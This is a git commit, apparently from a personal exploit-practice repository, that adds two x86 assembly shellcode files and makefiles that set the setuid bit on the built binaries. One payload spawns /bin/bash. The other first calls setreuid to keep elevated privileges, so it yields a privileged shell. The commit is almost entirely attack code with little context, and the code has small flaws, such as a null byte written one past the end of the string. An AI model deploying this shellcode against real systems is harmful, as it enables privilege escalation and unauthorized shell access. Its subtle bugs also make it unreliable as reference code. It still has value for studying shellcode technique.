commit 0c7b4ed75157aa9d781e4eec92a0a604c4c45c9c
Author: Brett Weiland <techcrazybsw@gmail.com>
Date:   Fri Nov 20 17:57:20 2020 -0600

            new file:   exec_cmd/makefile
            new file:   exec_cmd/shell
            new file:   exec_cmd/shell.asm
            new file:   exec_cmd/shell.o
            new file:   exec_cmd_setuid/makefile
            new file:   exec_cmd_setuid/shell
            new file:   exec_cmd_setuid/shell.asm
            new file:   exec_cmd_setuid/shell.o

diff --git a/exec_cmd/makefile b/exec_cmd/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd/makefile
@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
diff --git a/exec_cmd/shell b/exec_cmd/shell
new file mode 100755
index 0000000..9ea0d3b
Binary files /dev/null and b/exec_cmd/shell differ
diff --git a/exec_cmd/shell.asm b/exec_cmd/shell.asm
new file mode 100644
index 0000000..d90d9a4
--- /dev/null
+++ b/exec_cmd/shell.asm
@@ -0,0 +1,19 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, edx
+xor edx, edx
+int 0x80
+
+
+data:
+call exploit 
+cmd: db '/bin/bash'
diff --git a/exec_cmd/shell.o b/exec_cmd/shell.o
new file mode 100644
index 0000000..50283e1
Binary files /dev/null and b/exec_cmd/shell.o differ
diff --git a/exec_cmd_setuid/makefile b/exec_cmd_setuid/makefile
new file mode 100644
index 0000000..676ee34
--- /dev/null
+++ b/exec_cmd_setuid/makefile
@@ -0,0 +1,5 @@
+make:
+	nasm shell.asm -felf32 -o shell.o
+	ld -m elf_i386 shell.o -o shell -s
+	chmod u+s shell
+
diff --git a/exec_cmd_setuid/shell b/exec_cmd_setuid/shell
new file mode 100755
index 0000000..9a98c4f
Binary files /dev/null and b/exec_cmd_setuid/shell differ
diff --git a/exec_cmd_setuid/shell.asm b/exec_cmd_setuid/shell.asm
new file mode 100644
index 0000000..504685f
--- /dev/null
+++ b/exec_cmd_setuid/shell.asm
@@ -0,0 +1,28 @@
+global _start
+_start:
+jmp short data
+
+exploit:
+
+xor edx, edx
+
+xor eax, eax ; set reuid
+xor ebx, ebx
+xor ecx, ecx
+mov al, 203
+mov bx, 14005 
+mov cx, 14005
+int 0x80
+
+xor eax, eax
+xor ebx, ebx
+xor ecx, ecx
+pop edx
+mov [edx + 10], eax
+mov al, 11
+mov ebx, cmd
+int 0x80
+
+data:
+call exploit ; this puts the address of where we're at (where the string is!) in the stack and jmps to start 
+cmd: db '/bin/bash'
diff --git a/exec_cmd_setuid/shell.o b/exec_cmd_setuid/shell.o
new file mode 100644
index 0000000..59be327
Binary files /dev/null and b/exec_cmd_setuid/shell.o differ